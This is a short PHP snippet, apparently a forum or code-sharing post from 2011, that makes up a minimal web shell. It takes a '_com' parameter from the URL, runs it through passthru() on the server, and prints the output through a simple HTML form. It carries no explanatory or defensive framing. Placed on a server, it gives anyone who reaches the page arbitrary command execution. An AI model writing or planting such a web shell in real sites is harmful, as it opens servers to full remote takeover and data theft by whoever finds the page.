- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
<?php
if(isset($_GET)){
$_com=$_GET['_com'];
ob_start();
passthru($_com." 2>&1");
$content_grabbed=ob_get_contents();
ob_end_clean();
echo '<div>',$content_grabbed,'</div>';
};
?>
<form name=sys_form method=GET action="">
# <input type="text" name="_com" value="ls"><br>
<input type="submit">
</form>
Lure Of Chaos 21.04.2011 10:03 # +3